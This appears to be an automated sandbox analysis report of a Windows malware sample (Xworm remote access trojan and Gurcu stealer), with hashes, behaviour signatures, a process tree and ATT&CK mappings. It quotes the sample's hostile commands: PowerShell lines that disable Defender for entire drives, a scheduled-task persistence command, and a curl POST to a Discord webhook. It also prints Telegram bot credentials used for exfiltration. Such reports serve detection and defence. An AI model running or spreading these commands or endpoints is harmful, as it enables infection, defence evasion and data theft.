Analysis
-
max time kernel
146s -
max time network
165s -
platform
windows11-21h2_x64 -
resource
win11-20240704-en -
resource tags
-
submitted
08-07-2024 01:57
General
-
Target
ey341.exe
-
Size
64KB
-
MD5
a43a55c5578f61d05ce146ead83e745a
-
SHA1
83093f791120d3e74b0d0847aebc52d3c9f04078
-
SHA256
de4d28dd8c9208fe86dec1e014913f3cfefdcadf73a7adb6eb062677f5f5772f
-
SHA512
a49839e60d77003090e0c9f602a64e597648e7151d99c5096479984cee32d376c8bd425114704b9366d213d0e9494900a726dead28e0548c5b7788ad5e5cbf1d
-
SSDEEP
1536:BmxzG1o8ep4jtWQ/GZg8S7gbgUBGK7/J6DOSsvk:Bmx61oFp4jtWQuuLgbgUgK7AOSss
Malware Config
Extracted
xworm
-
Install_directory
%ProgramData%
-
install_file
winlogon.exe
-
pastebin_url
https://pastebin.com/raw/kTrgfRNT
-
telegram
https://api.telegram.org/bot6820329388:AAG0ljIyZ1Cj86n9cgzLGNBMldBe9TtqhAM/sendMessage?chat_id=1330099235
Extracted
gurcu
https://api.telegram.org/bot6820329388:AAG0ljIyZ1Cj86n9cgzLGNBMldBe9TtqhAM/sendMessage?chat_id=1330099235
Signatures
-
Detect Xworm Payload 2 IoCs
-
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Disables RegEdit via registry modification 1 IoCs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 6 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
-
Modifies Control Panel 2 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 59 IoCs
-
Suspicious use of AdjustPrivilegeToken 12 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 39 IoCs
-
System policy modification 1 TTPs 5 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ey341.exe"C:\Users\Admin\AppData\Local\Temp\ey341.exe"1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ey341.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ey341.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Local\Temp\bpjqwu.exe"C:\Users\Admin\AppData\Local\Temp\bpjqwu.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2B8F.tmp\2B90.tmp\2B91.bat C:\Users\Admin\AppData\Local\Temp\bpjqwu.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session5⤵
-
-
-
C:\Windows\system32\net.exenet session4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session5⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'F:\'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exeTimeout /t 2 /nobreak4⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\curl.execurl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"ok yes = Admin\"}" https://discord.com/api/webhooks/1256685656042770514/cT3cfWiuStxsqAn9Hxjtb_A3ddEwoqWoI__e_KjA2vlu7h3WeLiaJNZp_qhl3f3E_uQo4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jxntbc.EXE"C:\Users\Admin\AppData\Local\Temp\jxntbc.EXE"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\ydrwcn.exe"C:\Users\Admin\AppData\Local\Temp\ydrwcn.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\wnsxbw.exe"C:\Users\Admin\AppData\Local\Temp\wnsxbw.exe"2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- System policy modification
-
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeexplorer.exe1⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004B81⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD5a43a55c5578f61d05ce146ead83e745a
SHA183093f791120d3e74b0d0847aebc52d3c9f04078
SHA256de4d28dd8c9208fe86dec1e014913f3cfefdcadf73a7adb6eb062677f5f5772f
SHA512a49839e60d77003090e0c9f602a64e597648e7151d99c5096479984cee32d376c8bd425114704b9366d213d0e9494900a726dead28e0548c5b7788ad5e5cbf1d
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
Filesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
Filesize
944B
MD5e8a7ab7bae6a69946da69507ee7ae7b0
SHA1b367c72fa4948493819e1c32c32239aa6e78c252
SHA256cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272
SHA51289b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683
-
Filesize
944B
MD5f8c40f7624e23fa92ae2f41e34cfca77
SHA120e742cfe2759ac2adbc16db736a9e143ca7b677
SHA256c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b
SHA512f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7
-
Filesize
944B
MD500bd36561a6192618b0c5122b6ebf557
SHA1f344b9534d0fe4740ef43d27d2f3e9b158672e60
SHA25627a0a6f30a8f916248ba5e7cc3d67c114c3c4a2543ab223b313707876fc85fa6
SHA5129b56e61ff6187cb7d4d4509377a629707598d200939f53c9e9641a32133c180d62d81adef68ce7c28421321e5368930a9bc328770102b1c00480f41dffd486ff
-
Filesize
944B
MD5cad6ee71e2f46608490520923ec5d2ff
SHA1e975523ab16e08c69c671db25eb18a17ebeddeae
SHA256a844aef1c1a30f44b01052bc36aa683e0f5a62b1b98bd4db09350630a223a753
SHA5125fcd17d2ea19c1882d20471a2b9ae35eb0e46f3a34346447ce0f29ce193cc52d61fc77c5998e47c3a82c00cd6445a45a3083aa041c9b247397fce79ebeda9163
-
Filesize
1KB
MD51356fcea9147c3bde1541e047d4b102b
SHA1941eb579edf7f4cf5ec602a1e7b7ced27d525d13
SHA256477741b3e5a8968f85117a68638377a93cec72b4280e5a62c763ccee4da68871
SHA512f463e47f6fd24d55b3ba02ea304733b6dee46f6580a2335a70996276cb1e14a6d097dde943b8ca969d76f4818a3c125f2183cc2ab62f2d172e416db415a00684
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
121KB
MD55d64b19f27eeabeab0eb77da92f3763b
SHA1f55dee1a71ec48f87e734e43a8e012421a6076bc
SHA256622fcd2f5c02863ef372cce755cf7692ece0191be5e586d5441abd0e94f2be87
SHA51204e50f9ec4cf7a87c66982bf52e0c7f41619b858c6d30978cae27a096e3e6f3840da96f30bae82a02b4797c7576f0bb7dc99b31728fba2c114401b2189da280e
-
Filesize
287KB
MD52d07f1732527ea206a20d48372994458
SHA19886fc5cc285f2250ae500daa98ad72d4afd8e72
SHA256a4ea663aa319447d49c40a6f825fe9d557977a633c263449f60d5d6768e39abd
SHA512c30869e0b3ad77979feaa00f97f3a7440e8b66b238c1e1403e61745a06f215c18f6e6895ebbccdf862fed8f5f4e746a17e1e1d97edbac09fbfd59efe232d3e71
-
Filesize
24KB
MD51a4bab8710264cbee18fccd998dd4dd3
SHA141e6d14da0a559a3764bd57cd8017e4c5b41a97b
SHA256522690525ad617c5995ee43c1efcf7c4e43750e9118825f054cc2136e19d93a9
SHA512d279e5fe40dcacaba2cd162cb3f18219868768612b50da460d4acc02e358e7b83033a685dc68c2741a2e8048b6df525bc99a825e87b8a03679d8ee23847ebdfa
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
48KB
-
Filesize
88KB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
308KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
1.3MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB